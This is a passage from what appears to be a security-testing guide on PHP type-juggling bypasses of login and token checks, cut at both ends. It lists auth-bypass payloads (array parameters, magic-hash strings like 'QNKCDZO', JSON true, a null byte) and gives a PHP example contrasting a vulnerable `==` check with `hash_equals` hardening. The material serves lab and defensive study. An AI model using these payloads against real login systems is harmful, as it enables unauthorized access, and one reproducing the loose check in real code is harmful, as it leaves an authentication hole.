), HMAC/hash loose checks, NULL from bad types, and CTF-style `strcmp`/`json_decode`/`intval` tricks. Use strict routing: map the sink (`==` vs `hash_equals`), the PHP major version, and whether both operands are attacker-controlled. Routing note: when you encounter PHP login/signature logic or code like `md5($_GET['x'])==md5($_GET['y'])`, start with this skill; if `hash_equals`/`===` is already used, this path usually does not apply.
0. QUICK START
First-pass goal: prove the server branch treats unequal secrets/tokens as equal via coercion, not guess the real password.
First-pass payloads (auth / token shape):
- `password[]=x`
- `password=`
- `0`
- `0e12345`
- `240610708`
- `QNKCDZO`
- `true`
- `[]`
- `{"password":true}`
- `admin%00`
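The sink distinction above (`==` vs `hash_equals`, plus input type) written out as a runnable check, as an added example rather than code from the skill itself; the function names and the stored digest are constructed for the illustration, and the inputs are the skill's own probe values.

```php
<?php
// Added example, not code from the original skill: the same token check written
// with a loose comparison and with a strict one. Function names and the stored
// digest are constructed for this illustration.

// Constructed: digest of a secret the client never learns. md5('240610708') is
// "0e" followed only by digits, so `==` treats it as the float 0.0.
$storedDigest = md5('240610708');

// Vulnerable: `==` compares two numeric strings numerically, so any input whose
// digest also has the "0e<digits>" shape (e.g. 'QNKCDZO') is accepted.
function loose_check(string $submitted, string $storedDigest): bool {
    return md5($submitted) == $storedDigest;
}

// Hardened: hash_equals() is a byte-for-byte, constant-time comparison and no
// numeric coercion happens. The stored value goes first (known-string argument).
function strict_check(string $submitted, string $storedDigest): bool {
    return hash_equals($storedDigest, md5($submitted));
}

// Hardened input handling: anything that is not a plain string (an array from
// `password[]=x`, a JSON `true`) is rejected before it reaches a comparison.
// Without this, strcmp() on an array returns NULL in PHP 7 (and NULL == 0 holds)
// and throws a TypeError in PHP 8; `true == "any non-empty string"` holds in all versions.
function validated_check($submitted, string $storedDigest): bool {
    if (!is_string($submitted)) {
        return false;
    }
    return strict_check($submitted, $storedDigest);
}

$cases = [
    'magic-hash collision' => 'QNKCDZO',
    'correct secret'       => '240610708',
];
foreach ($cases as $label => $input) {
    printf("%-22s loose=%-5s strict=%-5s\n", $label,
        var_export(loose_check($input, $storedDigest), true),
        var_export(strict_check($input, $storedDigest), true));
}

// Bool from a JSON body, as the skill's {"password":true} probe describes.
$body = json_decode('{"password":true}', true);
printf("json true: loose=%s validated=%s\n",
    var_export($body['password'] == 'real-secret', true),
    var_export(validated_check($body['password'], $storedDigest), true));
```

Run it once under PHP 7 and once under PHP 8 to see which coercions the major version still permits; only the loose branch changes, the `hash_equals`/`is_string` branch does not.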
Minimal PHP probes (local or `php -r` in lab)